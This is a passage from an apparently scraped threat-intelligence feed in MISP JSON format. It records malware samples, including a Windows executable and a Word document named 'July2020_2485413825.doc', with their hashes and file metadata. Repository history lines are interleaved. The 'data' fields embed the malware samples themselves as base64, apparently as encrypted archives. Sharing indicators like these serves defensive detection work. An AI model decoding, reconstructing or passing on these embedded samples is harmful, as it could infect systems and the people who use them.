kCK/o//8swixj+o3NfFiEt7baoQD0BMfB05oY1hqcIgbteME21JE9m7xkKvAKV4HIuX7YtaQDtspDcrnnhL1YlE6YFqF2re9pAfJqMF5gWx++Ys3/P5STZ7xik86hk/+xUlBH0B6MnD3gDuhje8EGjcY8kw+rebv0drZikce0FPv+1XspiuMJszSaIZ+oNs3XpsNlo7v5xEUr4i00tshtKahPdiFxh2RuMghyRV9pn/H1vY+TgjU5NYHnoJkqb7oODgCPV1qQ+2ozjiIn4C2pk7tM8TukkPIsHq9OPe70+d/FryBE/rUdF80mRVu1YghI7ck1wcoA5OFu1EE2VTiRchPW3BtjuPuTc8eDF8mZse380hDRfHkVJpOUyVrqjwEnF8qo11KnxokYe20k1KwRHvOxw8PS3LSOzaoBk69lCvgvzudWWlMVzWog0Bs1bacYYUa9vfSrZOAtSYcADj1RU1QJXSxWquYC8VmxRhy6MwEOV7PNVviknII26GDK1KWRHqulkpQIsnxqRQ6FGKEfDQrCDS+ktzNuW74lT5YtN5Xy9Mf3r60UpWqlPEHQI59pdOKxG/Mw4eCQRzdebFx72vj1BV73HzkxY/TA8M0urWNKohuetd9v+2ginvvJiRoPKuZmIVkj/zUO+85ekT+J5Z5FAFU0qayQOr1Idm6QQV9+ncZD7Ggeu3L5dtKdfOasI+PAiUivXiTHl0eD+PoyH1XZVweQPUWShIoCP1KjTzq+v4am/ref3ft4glTlLDmU+Ico4cG1QEs8ag6pDEF8WJgq115uOYDOlZblddkiFlitZunF8CmV5FjCo02aRdRQmGQxobXSZj9rekD1/cyPpLQSO2qsygjMTbxJXEWDQRPwHJDVv29vvHaTWAIsnT1hekOIvnyVqW
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1596394150",
"to_ids": true,
"type": "malware-sample",
"uuid": "7834ffa0-d80f-47f9-a7c6-2f02fc66ea86",
"value": "123.bin|3994131da9d08aa5ca8b4fc671d4c9db"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "mimetype",
"timestamp": "1596394219",
"to_ids": false,
"type": "mime-type",
"uuid": "bd4c88f4-ce90-4440-a627-43afcde5718f",
"value": "application/x-dosexec"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596394236",
"to_ids": true,
"type": "ssdeep",
"uuid": "2c1ba2b6-bdfe-49e6-838e-a6f2502bc5c5",
"value": "6144:BKzJkuYHxK6BGiK1kz6q3Gy+2GcsIUo8Ewqbwk9oSp:Azr8jBoij+2G0BDwkoSp"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "20",
"timestamp": "1596415592",
"uuid": "9bb216ae-af15-4cba-9d65-40be296d9438",
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1596415652",
"to_ids": true,
"type": "malware-sample",
"uuid": "b2c5105b-4842-4d7d-b0b4-9f21f0f70f6c",
"value": "July2020_2485413825.doc|0a4fd937473fd2731569d1a39411477e"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1596415756",
"to_ids": false,
"type": "filename",
"uuid": "1d70bcf2-a760-40a0-8294-e7475bf03e46",
"value": "July2020_2485413825.doc"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596415850",
"to_ids": true,
"type": "md5",
"uuid": "a33b0134-5cda-4fa8-9ee1-559a90b8931d",
"value": "0a4fd937473fd2731569d1a39411477e"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596415948",
"to_ids": true,
"type": "sha1",
"uuid": "da4f21a2-c377-494b-b1a1-767f569276d0",
"value": "cfb9390326c41ac0e81b0274386bae21c53307b1"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596416048",
"to_ids": true,
"type": "sha256",
"uuid": "ec4fdde7-3768-4f9b-abac-7419b4381c0b",
"value": "e3589aa5d687e58ee97bda2c501bcba9d5e942fe929644602dd1645b3c7f0e94"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596416239",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "647ecf2f-9412-46bc-a0ba-772932e19a1a",
"value": "623616"
}
]
}
chg: [feed] added
2023-04-21 13:25:09 +00:00
]
chg: [gen] updated
2023-12-14 14:30:15 +00:00
}
chg: [feed] added
2023-04-21 13:25:09 +00:00
}
Reference in a new issue Copy permalink